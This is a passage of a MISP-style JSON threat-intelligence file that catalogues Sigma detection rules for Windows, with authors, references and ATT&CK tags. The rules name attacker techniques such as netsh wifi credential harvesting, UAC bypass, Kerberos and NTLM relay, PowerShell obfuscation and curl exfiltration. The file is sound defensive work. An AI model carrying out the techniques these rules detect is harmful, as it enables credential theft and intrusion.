"related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", "value": "Non-privileged Usage of Reg or Powershell" }, { "description": "Detects inline execution of PowerShell code from a file", "meta": { "author": "frack113", "creation_date": "2022-12-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_exec_data_file.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_exec_data_file.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", "value": "Powershell Inline Execution From A File" }, { "description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", "creation_date": "2019-09-12", "falsepositive": [ "Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies" ], "filename": "proc_creation_win_powershell_non_interactive_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_non_interactive_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f4bbd493-b796-416e-bbf2-121235348529", "value": "Non Interactive PowerShell Process Spawned" }, { "description": "Detects nltest commands that can be used for information discovery", "meta": { "author": "Arun Chauhan", "creation_date": "2023-02-03", "falsepositive": [ "Legitimate administration activity" ], "filename": "proc_creation_win_nltest_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_execution.yml" ], "tags": [ "attack.discovery", "attack.t1016", "attack.t1018", "attack.t1482" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "903076ff-f442-475a-b667-4f246bcc203b", "value": "Nltest.EXE Execution" }, { "description": "Identifies the creation of local users via the net.exe command.", "meta": { "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", "creation_date": "2018-10-30", "falsepositive": [ "Legitimate user creation.", "Better use event IDs for user creation rather than command line rules." ], "filename": "proc_creation_win_net_user_add.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" ], "tags": [ "attack.persistence", "attack.t1136.001" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", "value": "New User Created Via Net.EXE" }, { "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs.", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2022-12-29", "falsepositive": [ "Legitimate usage for administration purposes" ], "filename": "proc_creation_win_ssh_proxy_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/211/files", "https://lolbas-project.github.io/lolbas/Binaries/Ssh/", "https://man.openbsd.org/ssh_config#LocalCommand", "https://gtfobins.github.io/gtfobins/ssh/", "https://man.openbsd.org/ssh_config#ProxyCommand", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssh_proxy_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "value": "Program Executed Using Proxy/Local Command Via SSH.EXE" }, { "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "value": "File Download Via Bitsadmin To An Uncommon Target Folder" }, { "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", "meta": { "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-03-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_snapins_hafnium.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.intrinsec.com/apt27-analysis/", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.collection", "attack.t1114" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "25676e10-2121-446e-80a4-71ff8506af47", "value": "Exchange PowerShell Snap-Ins Usage" }, { "description": "Detect the harvesting of wifi credentials using netsh.exe", "meta": { "author": "Andreas Hunkeler (@Karneades), oscd.community", "creation_date": "2020-04-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42b1a5b8-353f-4f10-b256-39de4467faff", "value": "Harvesting Of Wifi Credentials Via Netsh.EXE" }, { "description": "Detects the use of KrbRelay, a Kerberos relaying tool", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-27", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_krbrelay.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/cube0x0/KrbRelay", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_krbrelay.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "value": "HackTool - KrbRelay Execution" }, { "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "value": "UAC Bypass Using PkgMgr and DISM" }, { "description": "Detects execution of \"curl.exe\" with the \"file://\" protocol handler in order to read local files.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_local_file_read.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml" ], "tags": [ "attack.execution" ] }, "uuid": "aa6f6ea6-0676-40dd-b510-6e46f02d8867", "value": "Local File Read Using Curl.EXE" }, { "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9212f354-7775-4e28-9c9f-8f0a4544e664", "value": "Active Directory Database Snapshot Via ADExplorer" }, { "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", "meta": { "author": "frack113", "creation_date": "2022-12-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_token_obfuscation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_token_obfuscation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.009" ] }, "related": [ { "dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "value": "Powershell Token Obfuscation - Process Creation" }, { "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior", "creation_date": "2021-12-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_disable.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/MichalKoczwara/status/1553634816016498688", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_disable.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", "value": "Disable Important Scheduled Task" }, { "description": "Detects the creation of a new service using powershell.", "meta": { "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "creation_date": "2023-02-20", "falsepositive": [ "Legitimate administrator or user creates a service for legitimate reasons.", "Software installation" ], "filename": "proc_creation_win_powershell_create_service.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_create_service.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", "value": "New Service Creation Using PowerShell" }, { "description": "Detects the addition of a new LogonScript to the registry value \"UserInitMprLogonScript\" for potential persistence", "meta": { "author": "Tom Ueltschi (@c_APT_ure)", "creation_date": "2019-01-12", "falsepositive": [ "Legitimate addition of Logon Scripts via the command line by administrators or third party tools" ], "filename": "proc_creation_win_registry_logon_script.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_logon_script.yml" ], "tags": [ "attack.persistence", "attack.t1037.001" ] }, "related": [ { "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "21d856f9-9281-4ded-9377-51a1a6e2a432", "value": "Potential Persistence Via Logon Scripts - CommandLine" }, { "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", "meta": { "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "creation_date": "2022-05-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_ntlmrelay.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/med0x2e/status/1520402518685200384", "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_ntlmrelay.yml" ], "tags": [ "attack.privilege-escalation", "attack.credential-access", "attack.t1212" ] }, "related": [ { "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bb76d96b-821c-47cf-944b-7ce377864492", "value": "Suspicious NTLM Authentication on the Printer Spooler Service" }, { "description": "Detects Obfuscated Powershell via Stdin in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490", "value": "Invoke-Obfuscation Via Stdin" }, { "description": "Detects potentially suspicious child processes of \"aspnet_compiler.exe\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_aspnet_compiler_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/", "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ccba514-7cb6-4c5c-b377-700758f2f120", "value": "Suspicious Child Process of AspNetCompiler" }, { "description": "Detects RDP session hijacking by using MSTSC shadowing", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-01-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/kmkz_security/status/1220694202301976576", "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml" ], "tags": [ "attack.lateral-movement", "attack.t1563.002" ] }, "related": [ { "dest-uuid": "e0033c16-a07e-48aa-8204-7c3ca669998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "value": "Potential MSTSC Shadowing Activity" }, { "description": "Detects suspicious PowerShell invocation with a parameter substring", "meta": { "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_susp_parameter_variation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36210e0d-5b19-485d-a087-c096088885f0", "value": "Suspicious PowerShell Parameter Substring" }, { "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-01", "falsepositive": [ "False positives may occur with troubleshooting scripts" ], "filename": "proc_creation_win_sc_disable_service.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_disable_service.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85c312b7-f44d-4a51-a024-d671c40b49fc", "value": "Service StartupType Change Via Sc.EXE" }, { "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", "meta": { "author": "Agro (@agro_sev) oscd.communitly", "creation_date": "2020-10-13", "falsepositive": [ "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." ], "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/pabraeken/status/993298228840992768", "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", "value": "SQL Client Tools PowerShell Session Detection" }, { "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_csvde_export.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms", "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit", "https://redcanary.com/blog/msix-installers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csvde_export.yml" ], "tags": [ "attack.exfiltration", "attack.discovery", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", "value": "Active Directory Structure Export Via Csvde.EXE" }, { "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-01", "falsepositive": [ "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], "filename": "proc_creation_win_net_user_default_accounts_manipulation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_default_accounts_manipulation.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b768e71-86f2-4879-b448-81061cbae951", "value": "Suspicious Manipulation Of Default Accounts Via Net.EXE" }, { "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-02-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_csproduct.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks", "https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_csproduct.yml" ], "tags": [ "attack.execution", "attack.t1047", "car.2016-03-002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", "value": "Hardware Model Reconnaissance Via Wmic.EXE" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-09-25", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_remote_access_tools_ultraviewer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_ultraviewer.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", "value": "Remote Access Tool - UltraViewer Execution" }, { "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-16", "falsepositive": [ "Legitimate use by an administrator" ], "filename": "proc_creation_win_lolbin_openconsole.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1537563834478645252", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", "value": "Use of OpenConsole" }, { "description": "Detects execution of \"curl.exe\" with a potential custom \"User-Agent\". Attackers can leverage this to download or exfiltrate data via \"curl\" to a domain that only accept specific \"User-Agent\" strings", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_custom_user_agent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml" ], "tags": [ "attack.execution" ] }, "uuid": "85de1f22-d189-44e4-8239-dc276b45379b", "value": "Curl Web Request With Potential Custom User-Agent" }, { "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-05", "falsepositive": [ "Unknown" ], 